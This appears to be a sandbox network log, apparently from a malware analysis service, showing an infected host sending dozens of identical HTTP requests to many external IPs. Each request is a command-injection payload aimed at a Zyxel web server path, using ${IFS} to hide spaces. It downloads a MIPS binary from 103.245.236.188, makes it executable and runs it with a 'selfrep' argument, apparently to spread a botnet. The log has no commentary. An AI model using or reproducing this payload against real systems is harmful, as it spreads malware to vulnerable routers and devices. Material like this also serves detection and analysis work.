                                    Jan 13, 2024 19:02:19.847366095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    763192.168.2.1351756217.154.5.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847399950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    764192.168.2.1360604134.23.239.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847450018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    765192.168.2.134214669.127.9.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847491026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    766192.168.2.1360380152.101.3.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847529888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    767192.168.2.1342772219.234.212.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847560883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    768192.168.2.134460846.152.247.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847604036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    769192.168.2.1351140209.113.206.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847634077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    770192.168.2.134485661.44.174.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847688913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    771192.168.2.1335982161.143.82.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847726107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    772192.168.2.1356058207.235.68.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847755909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    773192.168.2.1355672102.27.127.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847801924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    774192.168.2.1357932191.235.23.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847834110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    775192.168.2.1356956162.75.253.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847889900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    776192.168.2.133412673.58.235.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847930908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    777192.168.2.1343818125.70.127.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.847976923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    778192.168.2.135704293.162.34.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848012924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    779192.168.2.1354160185.133.181.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848047018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    780192.168.2.1334870219.204.123.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848113060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    781192.168.2.135854471.117.133.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848143101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    782192.168.2.133817034.1.129.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848171949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    783192.168.2.134604854.76.105.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848196983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    784192.168.2.1352324150.53.185.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848244905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    785192.168.2.134100877.172.102.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848278999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    786192.168.2.134897494.30.47.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848340988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    787192.168.2.135595898.90.22.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848368883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    788192.168.2.1352670115.186.179.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848401070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    789192.168.2.1344598134.25.59.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848454952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    790192.168.2.136063473.97.163.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848485947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    791192.168.2.1338820201.69.32.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848545074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    792192.168.2.1334152152.38.217.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848560095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    793192.168.2.1359328170.3.43.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848589897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    794192.168.2.1335538220.119.229.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848623991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    795192.168.2.136064012.207.47.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848663092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    796192.168.2.133884837.20.157.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848700047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    797192.168.2.1358878162.237.226.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848727942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    798192.168.2.1359390154.173.179.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848752975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    799192.168.2.13459489.129.150.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848829985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    800192.168.2.1359166201.250.204.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848862886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    801192.168.2.1343512166.154.72.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848917007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    802192.168.2.1349038171.26.99.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848937035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    803192.168.2.1343914216.110.59.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.848989964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    804192.168.2.1339426113.141.203.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849021912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    805192.168.2.1355976184.208.26.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849057913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    806192.168.2.1350686177.193.254.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849102020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    807192.168.2.1347652184.94.26.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849124908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    808192.168.2.134032697.215.162.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849174976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    809192.168.2.1347174175.151.127.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849215984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    810192.168.2.135662612.175.219.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849256039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    811192.168.2.1349290124.200.25.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849297047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    812192.168.2.1358458137.214.29.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849343061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    813192.168.2.1338894167.23.55.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849356890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    814192.168.2.1348194211.150.106.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849411011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    815192.168.2.1349712116.38.237.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849447012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    816192.168.2.1333308113.216.170.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849469900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    817192.168.2.1354670155.201.67.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849507093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    818192.168.2.1350668157.120.116.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849575043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    819192.168.2.135940217.199.108.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849596024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    820192.168.2.1356768193.71.106.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849632978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    821192.168.2.1360470200.47.48.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849662066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    822192.168.2.1348960156.210.251.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849725008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    823192.168.2.135291837.209.235.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849756956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    824192.168.2.1347150129.219.248.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.849791050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    825192.168.2.1334514100.37.136.57443
                                    TimestampBytes transferredDirectionData
